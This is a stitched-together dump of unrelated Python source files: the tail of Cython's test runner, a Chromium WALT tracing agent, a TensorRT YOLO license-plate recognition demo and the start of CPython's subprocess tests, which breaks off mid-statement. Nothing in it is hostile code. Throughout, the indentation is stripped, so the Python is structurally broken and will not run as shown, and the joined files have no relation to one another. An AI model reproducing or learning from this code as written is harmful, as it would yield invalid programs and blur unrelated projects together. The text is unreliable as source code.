parser.add_option("--no-cython", dest="with_cython",
action="store_false", default=True,
help="do not run the Cython compiler, only the C compiler")
parser.add_option("--compiler", dest="compiler", default=None,
help="C compiler type")
backend_list = ','.join(BACKENDS)
parser.add_option("--backends", dest="backends", default=backend_list,
help="select backends to test (default: %s)" % backend_list)
parser.add_option("--no-c", dest="use_c",
action="store_false", default=True,
help="do not test C compilation backend")
parser.add_option("--no-cpp", dest="use_cpp",
action="store_false", default=True,
help="do not test C++ compilation backend")
parser.add_option("--no-unit", dest="unittests",
action="store_false", default=True,
help="do not run the unit tests")
parser.add_option("--no-doctest", dest="doctests",
action="store_false", default=True,
help="do not run the doctests")
parser.add_option("--no-file", dest="filetests",
action="store_false", default=True,
help="do not run the file based tests")
parser.add_option("--no-pyregr", dest="pyregr",
action="store_false", default=True,
help="do not run the regression tests of CPython in tests/pyregr/")
parser.add_option("--no-examples", dest="examples",
action="store_false", default=True,
help="Do not run the documentation tests in the examples directory.")
parser.add_option("--no-code-style", dest="code_style",
action="store_false", default=True,
help="Do not run the code style (PEP8) checks.")
parser.add_option("--cython-only", dest="cython_only",
action="store_true", default=False,
help="only compile pyx to c, do not run C compiler or run the tests")
parser.add_option("--no-refnanny", dest="with_refnanny",
action="store_false", default=True,
help="do not regression test reference counting")
parser.add_option("--no-fork", dest="fork",
action="store_false", default=True,
help="do not fork to run tests")
parser.add_option("--sys-pyregr", dest="system_pyregr",
action="store_true", default=False,
help="run the regression tests of the CPython installation")
parser.add_option("-x", "--exclude", dest="exclude",
action="append", metavar="PATTERN",
help="exclude tests matching the PATTERN")
parser.add_option("-j", "--shard_count", dest="shard_count", metavar="N",
type=int, default=1,
help="shard this run into several parallel runs")
parser.add_option("--shard_num", dest="shard_num", metavar="K",
type=int, default=-1,
help="test only this single shard")
parser.add_option("--profile", dest="profile",
action="store_true", default=False,
help="enable profiling of the tests")
parser.add_option("-C", "--coverage", dest="coverage",
action="store_true", default=False,
help="collect source coverage data for the Compiler")
parser.add_option("--coverage-xml", dest="coverage_xml",
action="store_true", default=False,
help="collect source coverage data for the Compiler in XML format")
parser.add_option("--coverage-html", dest="coverage_html",
action="store_true", default=False,
help="collect source coverage data for the Compiler in HTML format")
parser.add_option("-A", "--annotate", dest="annotate_source",
action="store_true", default=True,
help="generate annotated HTML versions of the test source files")
parser.add_option("--no-annotate", dest="annotate_source",
action="store_false",
help="do not generate annotated HTML versions of the test source files")
parser.add_option("-v", "--verbose", dest="verbosity",
action="count", default=0,
help="display test progress, pass twice to print test names")
parser.add_option("-T", "--ticket", dest="tickets",
action="append",
help="a bug ticket number to run the respective test in 'tests/*'")
parser.add_option("-3", dest="language_level",
action="store_const", const=3, default=2,
help="set language level to Python 3 (useful for running the CPython regression tests)'")
parser.add_option("--xml-output", dest="xml_output_dir", metavar="DIR",
help="write test results in XML to directory DIR")
parser.add_option("--exit-ok", dest="exit_ok", default=False,
action="store_true",
help="exit without error code even on test failures")
parser.add_option("--failfast", dest="failfast", default=False,
action="store_true",
help="stop on first failure or error")
parser.add_option("--root-dir", dest="root_dir", default=os.path.join(DISTDIR, 'tests'),
help=("Directory to look for the file based "
"tests (the ones which are deactivated with '--no-file'."))
parser.add_option("--examples-dir", dest="examples_dir",
default=os.path.join(DISTDIR, 'docs', 'examples'),
help="Directory to look for documentation example tests")
parser.add_option("--work-dir", dest="work_dir", default=os.path.join(os.getcwd(), 'TEST_TMP'),
help="working directory")
parser.add_option("--cython-dir", dest="cython_dir", default=os.getcwd(),
help="Cython installation directory (default: use local source version)")
parser.add_option("--debug", dest="for_debugging", default=False, action="store_true",
help="configure for easier use with a debugger (e.g. gdb)")
parser.add_option("--pyximport-py", dest="pyximport_py", default=False, action="store_true",
help="use pyximport to automatically compile imported .pyx and .py files")
parser.add_option("--watermark", dest="watermark", default=None,
help="deterministic generated by string")
parser.add_option("--use_common_utility_dir", default=False, action="store_true")
parser.add_option("--use_formal_grammar", default=False, action="store_true")
parser.add_option("--test_determinism", default=False, action="store_true",
help="test whether Cython's output is deterministic")
parser.add_option("--pythran-dir", dest="pythran_dir", default=None,
help="specify Pythran include directory. This will run the C++ tests using Pythran backend for Numpy")
parser.add_option("--no-capture", dest="capture", default=True, action="store_false",
help="do not capture stdout, stderr in srctree tests. Makes pdb.set_trace interactive")
parser.add_option("--limited-api", dest="limited_api", default=False, action="store_true",
help="Compiles Cython using CPython's LIMITED_API")
options, cmd_args = parser.parse_args(args)
if options.with_cython and sys.version_info[0] >= 3:
sys.path.insert(0, options.cython_dir)
# requires glob with the wildcard.
if sys.version_info < (3, 5) or cmd_args:
options.code_style = False
WITH_CYTHON = options.with_cython
coverage = None
if options.coverage or options.coverage_xml or options.coverage_html:
if not WITH_CYTHON:
options.coverage = options.coverage_xml = options.coverage_html = False
elif options.shard_num == -1:
print("Enabling coverage analysis")
from coverage import coverage as _coverage
coverage = _coverage(branch=True)
coverage.erase()
coverage.start()
if options.xml_output_dir:
shutil.rmtree(options.xml_output_dir, ignore_errors=True)
if options.capture:
keep_alive_interval = 10
else:
keep_alive_interval = None
if options.shard_count > 1 and options.shard_num == -1:
import multiprocessing
pool = multiprocessing.Pool(options.shard_count)
tasks = [(options, cmd_args, shard_num) for shard_num in range(options.shard_count)]
errors = []
# NOTE: create process pool before time stamper thread to avoid forking issues.
total_time = time.time()
stats = Stats()
with time_stamper_thread(interval=keep_alive_interval):
for shard_num, shard_stats, return_code in pool.imap_unordered(runtests_callback, tasks):
if return_code != 0:
errors.append(shard_num)
sys.stderr.write("FAILED (%s/%s)\n" % (shard_num, options.shard_count))
sys.stderr.write("ALL DONE (%s/%s)\n" % (shard_num, options.shard_count))
stats.update(shard_stats)
pool.close()
pool.join()
total_time = time.time() - total_time
sys.stderr.write("Sharded tests run in %d seconds (%.1f minutes)\n" % (round(total_time), total_time / 60.))
if errors:
sys.stderr.write("Errors for shards %s\n" % ", ".join([str(e) for e in errors]))
return_code = 1
else:
return_code = 0
else:
with time_stamper_thread(interval=keep_alive_interval):
_, stats, return_code = runtests(options, cmd_args, coverage)
if coverage:
if options.shard_count > 1 and options.shard_num == -1:
coverage.combine()
coverage.stop()
stats.print_stats(sys.stderr)
if coverage:
save_coverage(coverage, options)
sys.stderr.write("ALL DONE\n")
sys.stderr.flush()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(return_code)
else:
sys.exit(return_code)
@contextmanager
def time_stamper_thread(interval=10):
"""
Print regular time stamps into the build logs to find slow tests.
@param interval: time interval in seconds
"""
if not interval or interval < 0:
# Do nothing
yield
return
try:
_xrange = xrange
except NameError:
_xrange = range
import threading
import datetime
from time import sleep
interval = _xrange(interval * 4)
now = datetime.datetime.now
stop = False
# We capture stderr in some places.
# => make sure we write to the real (original) stderr of the test runner.
stderr = os.dup(2)
def write(s):
os.write(stderr, s if type(s) is bytes else s.encode('ascii'))
def time_stamper():
while True:
for _ in interval:
if stop:
return
sleep(1./4)
write('\n#### %s\n' % now())
thread = threading.Thread(target=time_stamper, name='time_stamper')
thread.setDaemon(True) # Py2 ...
thread.start()
try:
yield
finally:
stop = True
thread.join()
os.close(stderr)
def configure_cython(options):
global CompilationOptions, pyrex_default_options, cython_compile
from Cython.Compiler.Options import \
CompilationOptions, \
default_options as pyrex_default_options
from Cython.Compiler.Options import _directive_defaults as directive_defaults
from Cython.Compiler import Errors
Errors.LEVEL = 0 # show all warnings
from Cython.Compiler import Options
Options.generate_cleanup_code = 3 # complete cleanup code
from Cython.Compiler import DebugFlags
DebugFlags.debug_temp_code_comments = 1
pyrex_default_options['formal_grammar'] = options.use_formal_grammar
if options.profile:
directive_defaults['profile'] = True
if options.watermark:
import Cython.Compiler.Version
Cython.Compiler.Version.watermark = options.watermark
def save_coverage(coverage, options):
if options.coverage:
coverage.report(show_missing=0)
if options.coverage_xml:
coverage.xml_report(outfile="coverage-report.xml")
if options.coverage_html:
coverage.html_report(directory="coverage-report-html")
def runtests_callback(args):
options, cmd_args, shard_num = args
options.shard_num = shard_num
return runtests(options, cmd_args)
def runtests(options, cmd_args, coverage=None):
WITH_CYTHON = options.with_cython
ROOTDIR = os.path.abspath(options.root_dir)
WORKDIR = os.path.abspath(options.work_dir)
if WITH_CYTHON:
configure_cython(options)
xml_output_dir = options.xml_output_dir
if options.shard_num > -1:
WORKDIR = os.path.join(WORKDIR, str(options.shard_num))
if xml_output_dir:
xml_output_dir = os.path.join(xml_output_dir, 'shard-%03d' % options.shard_num)
# RUN ALL TESTS!
UNITTEST_MODULE = "Cython"
UNITTEST_ROOT = os.path.join(os.path.dirname(__file__), UNITTEST_MODULE)
if WITH_CYTHON:
if os.path.exists(WORKDIR):
for path in os.listdir(WORKDIR):
if path in ("support", "Cy3"): continue
shutil.rmtree(os.path.join(WORKDIR, path), ignore_errors=True)
if not os.path.exists(WORKDIR):
os.makedirs(WORKDIR)
if options.shard_num <= 0:
sys.stderr.write("Python %s\n" % sys.version)
sys.stderr.write("\n")
if WITH_CYTHON:
sys.stderr.write("Running tests against Cython %s\n" % get_version())
else:
sys.stderr.write("Running tests without Cython.\n")
if options.for_debugging:
options.cleanup_workdir = False
options.cleanup_sharedlibs = False
options.fork = False
if WITH_CYTHON and include_debugger:
from Cython.Compiler.Options import default_options as compiler_default_options
compiler_default_options['gdb_debug'] = True
compiler_default_options['output_dir'] = os.getcwd()
if IS_PYPY:
if options.with_refnanny:
sys.stderr.write("Disabling refnanny in PyPy\n")
options.with_refnanny = False
if options.with_refnanny:
from pyximport.pyxbuild import pyx_to_dll
libpath = pyx_to_dll(os.path.join("Cython", "Runtime", "refnanny.pyx"),
build_in_temp=True,
pyxbuild_dir=os.path.join(WORKDIR, "support"))
sys.path.insert(0, os.path.split(libpath)[0])
CFLAGS.append("-DCYTHON_REFNANNY=1")
if options.limited_api:
CFLAGS.append("-DCYTHON_LIMITED_API=1")
if xml_output_dir and options.fork:
# doesn't currently work together
sys.stderr.write("Disabling forked testing to support XML test output\n")
options.fork = False
if WITH_CYTHON:
sys.stderr.write("Using Cython language level %d.\n" % options.language_level)
test_bugs = False
if options.tickets:
for ticket_number in options.tickets:
test_bugs = True
cmd_args.append('ticket:%s' % ticket_number)
if not test_bugs:
for selector in cmd_args:
if selector.startswith('bugs'):
test_bugs = True
selectors = [ string_selector(r) for r in cmd_args ]
verbose_excludes = selectors or options.verbosity >= 2
if not selectors:
selectors = [ lambda x, tags=None: True ]
# Check which external modules are not present and exclude tests
# which depends on them (by prefix)
missing_dep_excluder = MissingDependencyExcluder(EXT_DEP_MODULES)
version_dep_excluder = VersionDependencyExcluder(VER_DEP_MODULES)
exclude_selectors = [missing_dep_excluder, version_dep_excluder] # want to print msg at exit
try:
import IPython.core.release
if list(IPython.core.release._ver) < [1, 0, 0]:
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('IPython'))
try:
raise ImportError("Jedi typer is currently broken, see GH#1845")
import jedi
if not ([0, 9] <= list(map(int, re.findall('[0-9]+', jedi.__version__ or '0')))):
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('Jedi'))
if options.exclude:
exclude_selectors += [ string_selector(r) for r in options.exclude ]
if not COMPILER_HAS_INT128 or not IS_CPYTHON:
exclude_selectors += [RegExSelector('int128')]
if options.shard_num > -1:
exclude_selectors.append(ShardExcludeSelector(options.shard_num, options.shard_count))
if not test_bugs:
bug_files = [
('bugs.txt', True),
('pypy_bugs.txt', IS_PYPY),
('limited_api_bugs.txt', options.limited_api),
('windows_bugs.txt', sys.platform == 'win32'),
('cygwin_bugs.txt', sys.platform == 'cygwin')
]
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
for bugs_file_name, condition in bug_files if condition
]
global COMPILER
if options.compiler:
COMPILER = options.compiler
selected_backends = [ name.strip() for name in options.backends.split(',') if name.strip() ]
backends = []
for backend in selected_backends:
if backend == 'c' and not options.use_c:
continue
elif backend == 'cpp' and not options.use_cpp:
continue
elif backend not in BACKENDS:
sys.stderr.write("Unknown backend requested: '%s' not one of [%s]\n" % (
backend, ','.join(BACKENDS)))
sys.exit(1)
backends.append(backend)
if options.shard_num <= 0:
sys.stderr.write("Backends: %s\n" % ','.join(backends))
languages = backends
if 'TRAVIS' in os.environ and sys.platform == 'darwin' and 'cpp' in languages:
bugs_file_name = 'travis_macos_cpp_bugs.txt'
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
]
if options.use_common_utility_dir:
common_utility_dir = os.path.join(WORKDIR, 'utility_code')
if not os.path.exists(common_utility_dir):
os.makedirs(common_utility_dir)
else:
common_utility_dir = None
sys.stderr.write("\n")
test_suite = unittest.TestSuite()
stats = Stats()
if options.unittests:
collect_unittests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.doctests:
collect_doctests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.filetests and languages:
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir, add_embedded_test=True, stats=stats)
test_suite.addTest(filetests.build_suite())
if options.examples and languages:
for subdirectory in glob.glob(os.path.join(options.examples_dir, "*/")):
filetests = TestBuilder(subdirectory, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir,
default_mode='compile', stats=stats)
test_suite.addTest(filetests.build_suite())
if options.system_pyregr and languages:
sys_pyregr_dir = os.path.join(sys.prefix, 'lib', 'python'+sys.version[:3], 'test')
if not os.path.isdir(sys_pyregr_dir):
sys_pyregr_dir = os.path.join(os.path.dirname(sys.executable), 'Lib', 'test') # source build
if os.path.isdir(sys_pyregr_dir):
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, True, languages, test_bugs,
sys.version_info[0], common_utility_dir, stats=stats)
sys.stderr.write("Including CPython regression tests in %s\n" % sys_pyregr_dir)
test_suite.addTest(filetests.handle_directory(sys_pyregr_dir, 'pyregr'))
if options.code_style and options.shard_num <= 0:
try:
import pycodestyle
except ImportError:
# Hack to make the exclusion visible.
missing_dep_excluder.tests_missing_deps.append('TestCodeFormat')
else:
test_suite.addTest(TestCodeFormat(options.cython_dir))
if xml_output_dir:
from Cython.Tests.xmlrunner import XMLTestRunner
if not os.path.exists(xml_output_dir):
try:
os.makedirs(xml_output_dir)
except OSError:
pass # concurrency issue?
test_runner = XMLTestRunner(output=xml_output_dir,
verbose=options.verbosity > 0)
if options.failfast:
sys.stderr.write("--failfast not supported with XML runner\n")
else:
text_runner_options = {}
if options.failfast:
text_runner_options['failfast'] = True
test_runner = unittest.TextTestRunner(verbosity=options.verbosity, **text_runner_options)
if options.pyximport_py:
from pyximport import pyximport
pyximport.install(pyimport=True, build_dir=os.path.join(WORKDIR, '_pyximport'),
load_py_module_on_import_failure=True, inplace=True)
try:
gc.set_debug(gc.DEBUG_UNCOLLECTABLE)
except AttributeError:
pass # not available on PyPy
result = test_runner.run(test_suite)
if common_utility_dir and options.shard_num < 0 and options.cleanup_workdir:
shutil.rmtree(common_utility_dir)
if missing_dep_excluder.tests_missing_deps:
sys.stderr.write("Following tests excluded because of missing dependencies on your system:\n")
for test in missing_dep_excluder.tests_missing_deps:
sys.stderr.write(" %s\n" % test)
if options.with_refnanny:
import refnanny
sys.stderr.write("\n".join([repr(x) for x in refnanny.reflog]))
if options.exit_ok:
return options.shard_num, stats, 0
else:
return options.shard_num, stats, not result.wasSuccessful()
if __name__ == '__main__':
try:
main()
except Exception:
traceback.print_exc()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(1)
sys.exit(1)
|
walt_agent.py | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import optparse
import threading
import py_utils
from devil.android import device_utils
from systrace import trace_result
from systrace import tracing_agents
from py_trace_event import trace_time as trace_time_module
TRACE_FILE_PATH = \
'/sdcard/Android/data/org.chromium.latency.walt/files/trace.txt'
CLOCK_DOMAIN_MARKER = '# clock_type=LINUX_CLOCK_MONOTONIC\n'
def try_create_agent(options):
if options.is_walt_enabled:
return WaltAgent()
return None
class WaltConfig(tracing_agents.TracingConfig):
def __init__(self, device_serial_number, is_walt_enabled):
tracing_agents.TracingConfig.__init__(self)
self.device_serial_number = device_serial_number
self.is_walt_enabled = is_walt_enabled
def add_options(parser):
options = optparse.OptionGroup(parser, 'WALT trace options')
options.add_option('--walt', dest='is_walt_enabled', default=False,
action='store_true', help='Use the WALT tracing agent. '
'WALT is a device for measuring latency of physical '
'sensors on phones and computers. '
'See https://github.com/google/walt')
return options
def get_config(options):
return WaltConfig(options.device_serial_number, options.is_walt_enabled)
class WaltAgent(tracing_agents.TracingAgent):
"""
This tracing agent requires the WALT app to be installed on the Android phone,
and requires the WALT device to be attached to the phone. WALT is a device
for measuring latency of physical sensors and outputs on phones and
computers. For more information, visit https://github.com/google/walt
"""
def __init__(self):
super(WaltAgent, self).__init__()
self._trace_contents = None
self._config = None
self._device_utils = None
self._clock_sync_marker = None
self._collection_thread = None
def __repr__(self):
return 'WaltAgent'
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StartAgentTracing(self, config, timeout=None):
del timeout # unused
self._config = config
self._device_utils = device_utils.DeviceUtils(
self._config.device_serial_number)
if self._device_utils.PathExists(TRACE_FILE_PATH):
# clear old trace events so they are not included in the current trace
self._device_utils.WriteFile(TRACE_FILE_PATH, '')
return True
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StopAgentTracing(self, timeout=None):
"""Stops tracing and starts collecting results.
To synchronously retrieve the results after calling this function,
call GetResults().
"""
del timeout # unused
self._collection_thread = threading.Thread(
target=self._collect_trace_data)
self._collection_thread.start()
return True
def _collect_trace_data(self):
self._trace_contents = self._device_utils.ReadFile(TRACE_FILE_PATH)
def SupportsExplicitClockSync(self):
return True
def RecordClockSyncMarker(self, sync_id, did_record_clock_sync_callback):
cmd = 'cat /proc/timer_list | grep now'
t1 = trace_time_module.Now()
command_result = self._device_utils.RunShellCommand(cmd, shell=True)
nsec = command_result[0].split()[2]
self._clock_sync_marker = format_clock_sync_marker(sync_id, nsec)
did_record_clock_sync_callback(t1, sync_id)
@py_utils.Timeout(tracing_agents.GET_RESULTS_TIMEOUT)
def GetResults(self, timeout=None):
del timeout # unused
self._collection_thread.join()
self._collection_thread = None
return trace_result.TraceResult('waltTrace', self._get_trace_result())
def _get_trace_result(self):
result = '# tracer: \n' + CLOCK_DOMAIN_MARKER + self._trace_contents
if self._clock_sync_marker is not None:
result += self._clock_sync_marker
return result
def format_clock_sync_marker(sync_id, nanosec_time):
return ('<0>-0 (-----) [001] ...1 ' + str(float(nanosec_time) / 1e9)
+ ': tracing_mark_write: trace_event_clock_sync: name='
+ sync_id + '\n')
|
trt_yolo.py | """trt_yolo.py
This script demonstrates how to do real-time object detection with
TensorRT optimized YOLO engine.
"""
import os
import time
import argparse
import cv2
import pycuda.autoinit # This is needed for initializing CUDA driver
import threading
import json
from utils.yolo_classes import get_cls_dict
from utils.camera import add_camera_args, Camera
from utils.display import open_window, set_display, show_fps
from utils.visualization import BBoxVisualization
from utils.yolo_with_plugins import TrtYOLO
from utils.crop_image import crop_image
from utils.svm_extract import extract_text
# from utils.alpr import detect
from utils.openalpr import Alpr
WINDOW_NAME = 'TrtYOLODemo'
IMG_CROP_DIR = r'/home/john/Projects/tensorrt_demos/crop/'
def parse_args():
"""Parse input arguments."""
desc = ('Capture and display live camera video, while doing '
'real-time object detection with TensorRT optimized '
'YOLO model on Jetson')
parser = argparse.ArgumentParser(description=desc)
parser = add_camera_args(parser)
parser.add_argument(
'-c', '--category_num', type=int, default=80,
help='number of object categories [80]')
parser.add_argument(
'-t', '--conf_thresh', type=float, default=0.3,
help='set the detection confidence threshold')
parser.add_argument(
'-m', '--model', type=str, required=True,
help=('[yolov3-tiny|yolov3|yolov3-spp|yolov4-tiny|yolov4|'
'yolov4-csp|yolov4x-mish]-[{dimension}], where '
'{dimension} could be either a single number (e.g. '
'288, 416, 608) or 2 numbers, WxH (e.g. 416x256)'))
parser.add_argument(
'-l', '--letter_box', action='store_true',
help='inference with letterboxed image [False]')
args = parser.parse_args()
return args
def alpr_detect(alpr, img):
plate_num = alpr.recognize_ndarray(img)
# print(plate_num)
if (plate_num['results'] != []):
print(json.dumps(plate_num['results'], indent=4, sort_keys=True))
def loop_and_detect(alpr, cam, trt_yolo, conf_th, vis):
"""Continuously capture images from camera and do object detection.
# Arguments
cam: the camera instance (video source).
trt_yolo: the TRT YOLO object detector instance.
conf_th: confidence/score threshold for object detection.
vis: for visualization.
"""
isCropped = False
full_scrn = False
fps = 0.0
tic = time.time()
plate_num = ''
while True:
if isCropped == False:
img = cam.read()
if img is None:
break
boxes, confs, clss = trt_yolo.detect(img, conf_th)
for idx, id in enumerate(clss):
if id == 0:
cropped_img, dilation, thresh = crop_image(
img, boxes, idx, mBlur=3, gBlur=(5, 5))
# t = threading.Thread(
# target=alpr_detect, args=(alpr, cropped_img,))
# t.start()
alpr_detect(alpr, cropped_img)
#alpr_detect(alpr, img)
toc = time.time()
img = vis.draw_bboxes(img, boxes, confs, clss)
img = show_fps(img, fps)
cv2.imshow('cam', img)
curr_fps = 1.0 / (toc - tic)
fps = curr_fps if fps == 0.0 else (fps*0.95 + curr_fps*0.05)
tic = toc
key = cv2.waitKey(1)
if key == 27:
break
# isCropped = False
def main():
args = parse_args()
if args.category_num <= 0:
raise SystemExit('ERROR: bad category_num (%d)!' % args.category_num)
if not os.path.isfile('yolo/%s.trt' % args.model):
raise SystemExit('ERROR: file (yolo/%s.trt) not found!' % args.model)
cam = Camera(args)
if not cam.isOpened():
raise SystemExit('ERROR: failed to open camera!')
# cls_dict = get_cls_dict(args.category_num)
cls_dict = {0: 'license-plate', 1: 'vehicle'}
vis = BBoxVisualization(cls_dict)
trt_yolo = TrtYOLO(args.model, args.category_num, args.letter_box)
alpr = Alpr("us", "/usr/share/openalpr/runtime_data/config/us.conf",
"/usr/share/openalpr/runtime_data")
if not alpr.is_loaded():
print("Error loading OpenALPR")
else:
print("Using OpenALPR " + alpr.get_version())
alpr.set_top_n(1)
# alpr.set_default_region("wa")
alpr.set_detect_region(False)
# open_window(
# WINDOW_NAME, 'Camera TensorRT YOLO Demo',
# cam.img_width, cam.img_height)
loop_and_detect(alpr, cam, trt_yolo, args.conf_thresh, vis=vis)
cam.release()
cv2.destroyAllWindows()
alpr.unload()
if __name__ == '__main__':
main()
|
test_subprocess.py | import unittest
from unittest import mock
from test import support
import subprocess
import sys
import platform
import signal
import io
import os
import errno
import tempfile
import time
import selectors
import sysconfig
import select
import shutil
import gc
import textwrap
try:
import ctypes
except ImportError:
ctypes = None
else:
import ctypes.util
try:
import threading
except ImportError:
threading = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = support.strip_python_stderr(stderr)
# strip_python_stderr also strips whitespace, so we do too.
expected = expected.strip()
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
